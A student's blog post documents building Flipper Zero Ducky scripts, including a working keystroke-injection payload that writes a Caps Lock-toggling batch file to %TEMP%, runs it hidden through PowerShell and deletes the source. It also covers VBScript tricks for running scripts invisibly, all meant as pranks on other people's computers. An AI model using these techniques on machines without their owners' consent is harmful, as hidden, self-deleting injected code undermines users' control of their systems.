I bought a Flipper Zero, but this isn't going to be much of a talkative explanation about anything. This will be mostly technical.
My instructor, Doug, says that if I can get the Flipper using Ducky script to open a .txt file on a windows computer then you can get it to do anything. I did already write two .bat scripts to keep on a jump drive that are meant for pranks, and they both utilize a .vbs script to keep them silent (invisible to the user) and also insert the .bet scripts into RAM so the jump drive can be removed. We are going to attempt to convert all this to Ducky script so that this can all be done through the Flipper Zero.
I created a file with no text to put in the file but to get the Flipper to create a .txt on a windows computer in Ducky script, here is what you need to write:
DELAY 500
GUI r
DELAY 300
STRING notepad
ENTER
DELAY 500
STRING This is a test file created by Flipper Zero.
DELAY 500
CTRL s
DELAY 500
STRING C:\Users\%USERNAME%\Desktop\flipper_output.txt
ENTER
DELAY 500
ALT f4
So to explain what these commands do in Ducky script, the DELAY commands are necessary so that commands have time to finish executing before the next one is carried out. GUI is the command for pressing the windows key through the keyboard since the Flipper is acting like an HID device (keyboard). So GUI r means WINDOWS RUN which will bring up the Windows Run dialogue box. Next we have STRING notepad, this command tells the Flipper to write in the selected field the word NOTEPAD. ENTER obviously tells the Flipper to press the enter button, executing the command. When the file opens, we have another STRING command. This time the selected field is notepad itself and whatever you type after the word STRING, that will be typed by the Flipper into notepad on the windows computer as if you were typing it yourself on the keyboard. CTRL s simply tells the Flipper to save the notepad file on the windows computer. "STRING C:\Users\%USERNAME%\Desktop\flipper_output.txt" tells the Flipper to type the file path and name of the file into the save as field. So I did not know that you could dictate the file path from the file name line followed by the filename so you wouldn't have to type more than one thing. Cool! And just so you know, %USERNAME% is an environment variable. So you don't need to know the username, you can simply type %USERNAME% in the string and the Windows computer will assume that whatever the user is, to select that file path. ENTER clicks the save button. ALT f4 is the keyboard shortcut in Windows for closing the selected windows (program or folder), which in this case is closing notepad.
GUI r # Opens the Run dialog
STRING notepad # Types "notepad" to launch Notepad
ENTER # Opens Notepad
DELAY 500 # Waits for Notepad to open
STRING This is a test file created by Flipper Zero. # Types text into Notepad
CTRL s # Simulates Ctrl + S to open the Save dialog
DELAY 500 # Waits for the Save dialog to appear
STRING C:\Users\%USERNAME%\Desktop\flipper_output.txt # Types the file path and name
ENTER # Saves the file on the Desktop
DELAY 500 # Ensures the file is saved
ALT f4 # Closes Notepad
Now if you want to run .bat files on the windows computer through Ducky script off the Flipper, then there are two ways to do this. First you can use the method above to have the Flipper write in notepad a file and save it to then be run, or the second method which I prefer, is to have the Flipper open either command prompt or PowerShell to then run the commands from there without saving a file to the computer.
Thursday 2024-09-12 update
My classmate, Pierce, wants a Flipper Zero badly, but he doesn't have the money for one. I thought zI might fan the flame to get him to want to buy one by letting him play with mine and the benefit for me is that he helps me to create Ducky scripts for the Flipper. So most of the time when I pull it out he will forgo other projects and work on it, in fact all last weekend he worked on it for hours at a time trying to figure out how to convert into Ducky script the CAPS LOCK EVERY FIVE SECONDS prank script Doug and I wrote together with parts in .bat and another part in .vbs. It uses both because of two problems, which will haunt us.
It needs to run without the source file so it can be stored on a thumb drive, activated on someone else's computer, and you can run away with the thumb drive and it will keep turning caps lock on and off every five seconds until they figure out how to cancel it. It's not hard to cancel, you just need to reboot or open task manager and under BACKGROUND PROCESSE< end the task WINDOWS COMMAND PROCESSER. So you need to use the line in .vbs:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False.
CreateObject("Wscript.Shell") creates an instance of Wscript.shell so that it runs without the source file and WScript.Arguments(0) & """", 0, False says that it needs to run silently or rather, without a command prompt window. Because it negates the point of the prank if the user sees this caps lock loop running in a command line window and to stop it they can simply close the prompt and the process is ended.
We worked today for hours to try and figure out how to convert this into Ducky script. Here's the problem, it all can technically be multiple scripts written in one ducky script because the flipper acts as a keyboard, which when connected to the host computer, and the code is injected, it will open a run window in Windows with the command:
GUI r
And then it'll specify to use powershell, string, and then write the lines of code that powerhell will deduce is .bat, and each line of code is separated with a semicolon so it knows how to differentiate between separate commands on different lines that are all wrotten in one line in the run window. The run window allows us to avoid opening the powershell window so that it runs in the background, however the problem we run into here is that you can't run .vbs commands in the run window. And when Doug and I were writing the .bat script for the caps lock prank script, we were trying to figure out how to make this run in the background. We tried and tried and tried for weeks to get .bat to run the window in the background. We couldn't figure out how to do this. At this point it was probably back in January or March so I don't remember much about what we did. But I eventually learned that while this is either really hard to do or impossible in .bat, we started to have another problem as well, once the thumb drive is removed, the script stops running and hilariously, it starts running again when the drive is plugged back in. So we tried to solve both problems and this was extremely challenging.
I had eventually asked Doug what he did after learning that other computer languages ran in the background much more easily than .bat does. Since I had been programming the weather display in python, and python turned out to be one of the many languages that runs in the background easily, Doug told me that there is one huge problem with this, python is not natively installed on all windows machines, rendering this method useless because in order to pull a prank on anyone you wish, it has to be in a language that everyone's windows computer can run. You have to install Python in order for this to work.
I toyed with the idea of having the script install Python at the beginning of the script, or a separate script that does so, so that the other scripts can run in python. But I think you need permissions to do this, so that's out. Doug helped me and we discovered multiple times through multiple methods, including stackoverflow.com, that the only way to run invisibly is to write a .vbs script that makes it run in the background, and around this time Doug parted with the information that he wrote all his prank scripts in .vbs but that it would be really hard for me to do. And another problem is that if I take on projects in .vbs, no one is hiring for that, so it'd be a waste of effort. But we wrote the separate .vbs script creating the object Wscipt.shell and giving zero arguments so that it would not open a window, but creating this object would temporarily allow it to run without eh source file.
In Ducky script, you can tell it all in one script to write multiple scripts, and even define different languages, you just have tow rite everything in Ducky syntax with the addition of the code to be written on the host computer in the other program languages with their proper syntax, since Ducky is only telling the Flipper to write it, it doesn't actually know what these commands are, it doesn't need to know what they are doing or even how to interpret the language. The host computer will do all that, the Flipper just needs to write it. And Ducky actually looks pretty straightforward to write in. From what little I know, the Syntax is kind of minimal and clean looking. And it has the added bebenfit that you can simply write it as a .txt and save it on the Flipper. The Flipper will run it in Ducky, no special Ducky extension required.
But since the run window cannot run .vbs, we now have to solve this problem all over again if we want to run all these prank scripts from the Flipper. Obviously this isn't crucial. I have a thumb drive and the original scripts for these pranks Doug and I created on the thumb drive and I can simply roll up to a computer and activate said scripts and run away. But the cool thing about having a Flipper Zero is that it is built for this, and you can keep it in your pocket all the time. It acts as a remote, a hacking device, a thumb drive with keyboard functionality, I can use it to insert usernames and passwords into foreign computers without having to go through the trouble of holding my phone with Bitwarden running in one hand and typing the password and username in another computer, I can simply plug in and as long as I write the script properly, it will enter the username and password without issue. There are so many cool things that it does and I want to take advantage of all of them. I paid nearly $200 for this thing so I want to get as much out of it as I can, and the reason I paid that money is so that I could use these cool methods and learn how to program it so that it will do what I want, which sounded cool and I felt would also make me more employable.
So far, the thumb drive scripts are made up of three scripts, one activation script in .bat, the actual ccaps lock every five seconds script in .bat, and then the .vbs which hides it and runs it in the background.
Doug had Pierce and I figure out how to get Ducky to open notepad and write out the script and then save it, which is where I learned a week or two ago that it can name and save the file where you want it all from the filename line in the save as window. So we successfully got it to do that and Doug was now satisfied that since we could do that, we can just copy and paste any script into the existing template that opens run, which opens notepad, and then saves it where we want it, and then runs it.
I had a problem with this. It's a prank script. And to leave it on someone computer runs the risk of them finding it and being able to use it for free without going through all the effort I am going through. I prefer to keep it for myself unless I decide to share it, which I will do easily, I just want it to be my choice to do so. And also, I hate the idea of leaving a file on a host computer which may or may not cause problems later. If you do this prank again to the same person on the same computer, it may try to write the file just for the computer to say this file already exists, would you like to overwrite it and the script won't have that programmed in by default and on purpose because it will not be necessary on any computer that it hasn't been run on before. To add this step just in case may run the risk of the computer accidentally misinterpreting that extra command to yes, please overwrite and instead perhaps changes something else when the computer does not ask if you want to overwrite a file.
So we spent much of last night trying to figure out how to get .bat to hide the file and run it in the background. We wanted to run everything from the run window because then it activates the script without opening a permanent window and it can run .bat. The computer can also run power shell, which I think is .ps1 or .ps or something like that, I forgot, it has been a few months since I needed to know this for an exam. The computer can run .vbs but not from the run window and also Doug warned that employers are not hiring for this anymore since it is an outdated language I guess.
I scoured stackoverflow.com for other answers but everybody that answered the question about hiding the shell window or running in the background all said you needed .vbs. I stopped and thought for a minute, if .vbs is still the only one that can do this, then is it really that outdated? A little while later, Doug reminded us that we could either write a command to do the notepad option and thenw rite a command that will then delete it once its no longer needed, or we can put it in a temp folder called:
%TEMP%
So far, the Ducky script looks like this:
DEFAULT_DELAY 100
GUI R
STRING Notepad
ENTER
STRING @echo off
ENTER
STRING set "Toggle=0"
ENTER
STRING :loop
ENTER
STRING if %Toggle%==0 (
ENTER
TAB
STRING echo Turning Caps Lock on
ENTER
TAB
STRING set "Toggle=1"
ENTER
STRING ) else (
ENTER
TAB
STRING echo Turning Caps Lock off
ENTER
TAB
STRING set "Toggle=0"
ENTER
STRING )
ENTER
STRING powershell -command "$wsh = New-Object -ComObject WScript.Shell; $wsh.SendKeys('{CAPSLOCK}')"
ENTER
STRING timeout /t 5 /nobreak >nul
ENTER
STRING goto :loop
CTRL S
STRING %TEMP%\CAPSLOCKAGAIN.bat
ENTER
GUI R
STRING powershell
ENTER
STRING $batFileContent = Get-Content "$HOME\AppData\Local\Temp\CAPSLOCKAGAIN.bat"; $tempFile = [System.IO.Path]::GetTempPath() + 'script.bat'; Set-Content -Path $tempFile -Value $batFileContent; Start-Process -FilePath $tempFile -WindowStyle Hidden; Remove-Item "$HOME\AppData\Local\Temp\CAPSLOCKAGAIN.bat"
ENTER
So in case this matters, Pierce's version he started working on last weekend is called CAPSLOCKAGAIN in order to differentiate it from mine which is unconverted to Ducky.
It does work but one of the problems we came across was that it once activated, there's no WINDOWS COMMAND PROCESSOR task to end in task manager under BACKGROUND PROCESSES. So there's no way we know of yet to end this prank without rebooting which can get to be too much trouble, especially when testing and you have to reboot all the time. These pranks were not meant to be so vicious. I would like to choose how vicious I get and the more vicious while not intending to be so, the more I feel obligated to let the victims of these pranks off the hook easily and make it up to them.
No comments:
Post a Comment